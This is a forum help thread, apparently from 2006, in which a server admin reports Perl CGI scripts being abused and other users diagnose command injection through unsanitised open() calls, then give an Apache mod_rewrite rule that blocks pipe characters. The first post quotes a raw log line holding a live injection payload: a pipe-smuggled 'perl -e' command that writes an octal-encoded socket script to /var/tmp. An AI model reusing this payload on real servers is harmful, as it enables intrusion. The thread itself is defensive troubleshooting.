Perl being hacked

Hello,

I'm having a problem with one customer's server someone found a way to make perl run scripts on that server and I do not know if that's a perl bug or if there is something I can disable to make it stop... here is the line from the log file

65.7.178.227 - - [15/Apr/2006:03:33:53 -0400] "GET /cgi-bin/master.cgi?page=|perl%20-e%20%22print%20%5C%22%5C043%5C041%5C057%5C165%5C163%5C162%5C057%5C142%5C151%5C156%5C057%5C160%5C145%5C162%5C154%5C012%5C165%5C163%5C145%5C040%5C123%5C157%5C143%5C153%5C145%5C164%5C073%5C040%5C165%5C163%5C145%5C040%5C111%5C117%5C072%5C072%5C110%5C141%5C156%5C144%5C154%5C145%5C073%5C040%5C165%5C163%5C145%5C040%5C120%5C117%5C123%5C111%5C130%5C073%5C040%5C044%5C160%5C162%5C157%5C164%5C157%5C040%5C075%5C040%5C147%5C145%5C164%5C160%5C162%5C157%5C164%5C157%5C142%5C171%5C156%5C141%5C155%5C145%5C050%5C047%5C164%5C143%5C160%5C047%5C051%5C073%5C%22%22%20%3E/var/tmp/.mixed.2006| HTTP/1.1" 200 5

the file .mixed.2006 was there when I looked

Thank you in advance
adcentrixAsked:
Who is Participating?
 
m1tk4Commented:
RewriteRule (.*)\|(.*) / [forbidden,qsappend]

Sorry, missed that one. Before you try it try just requesting simething like /blabla|.htm to see if you placed it in the right container.

By default RewriteRule doesn't parse the query strings.

Again, you still should fix your software, because mod_rewrite only lets you control GET requests, but POST requests may still circumvent this.
0
 
m1tk4Commented:
This is a vulnerability in "master.cgi" - Perl by itself has nothing to do with it. Apparently, master.cgi does not do necessary checks for the safety of passed parameters and a request like this one makes it do something it's not supposed to do.

To make it stop you need to either disable or fix "master.cgi", your Perl is fine.

Unfortunately, I can't help you more without knowing what that master.cgi does.
0
 
pjedmondCommented:
This vulnerability could have been around for ages!:

http://seclists.org/lists/vuln-dev/2001/Jun/0006.html

June 2001?

It looks as if it is part of a link exchange system:

http://www.scriptgateway.com/scripts/cgiandperl/link_checking/s307492-link_master_v4_0.html

that is no longer supported.

Solution - get rid of the master.cgi script!

HTH:)
0
WEBINAR: 10 Easy Ways to Lose a Password

Join us on June 27th at 8 am PDT to learn about the methods that hackers use to lift real, working credentials from even the most security-savvy employees. We'll cover the importance of multi-factor authentication and how these solutions can better protect your business!

 
adcentrixAuthor Commented:
Thanks for the response, but this is happening with all the scripts on the server, it's not just this one... It's part of an ecommerce software that we developed under perl... It's running in other server without a problem...

I looked in the log and the inspostor is able to run any command that the user NOBODY is able to run if connected to the console... just by adding a pipe | at the end of the script and after that the command that is supposed to be run by the server...

Thanks
0
 
adcentrixAuthor Commented:
Is there sometype of command or instruction that I should add to the script to make it more secure? I only have the perl location line and after that I start with my own code? is that correct or it should have something else?
0
 
adcentrixAuthor Commented:
Maybe there is a way to ignore anything after a pipe | that is sent on the URL? Anyone knows anything about that?
0
 
m1tk4Commented:
>> Is there sometype of command or instruction that I should add to the script to make it more secure? I only have the perl location line and after that I start with my own code? is that correct or it should have something else?

I don't quite understand what you mean by "perl location line".

Your vulnerability is in your ecommerce software code, and it is similar to this one: http://www.kb.cert.org/vuls/id/496064, http://sans.org/resources/malwarefaq/guestbook.php (they provide ways to fix it too). If it happens to all your scripts on the server, they all have the same problem. Even if you did something on the other server to protect yourself from this (and you can do it by doing a url rewrite detecting presense of | characters in the request) your real problem is your code in the ecommerce suite you are talking about, and you still need to fix it.
0
 
m1tk4Commented:
>>Maybe there is a way to ignore anything after a pipe | that is sent on the URL? Anyone knows anything about that?

If it's Apache, you can use mod_rewrite to detect and block that - see http://httpd.apache.org/docs/2.0/misc/rewriteguide.html
0
 
adcentrixAuthor Commented:
It's an apache version 1.3.33 and the script has the open function on it...

That's nice but do you know how to use this command? and where should I add the command on the httpd.conf?

is this correct?
RedirectMatch ^|$ http://www.google.com/

Thank you very much for your help...
 

0
 
m1tk4Commented:
No, something like this:

RewriteRule (.*)\|(.*) / [forbidden]

| is a special character in regexp and needs to be escaped.
0
 
m1tk4Commented:
You can add it pretty much anywhere, .htaccess, <VirtualHost> container, <Directory> - it all depends on how your web server configuration is structured. Don't forget to add RewriteEngine on before it. See http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewriterule for detailed info on all rewrites.
0
 
adcentrixAuthor Commented:
I tried to add to the .htaccess and the <directory> but it does not affect the problem... it still accepts the command and does not forward to the forbiden page

Any suggestion?
0
 
adcentrixAuthor Commented:
Thank you very much m1tk4
It worked, I also fixed the problem on our software...

Have a nice weeked...
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.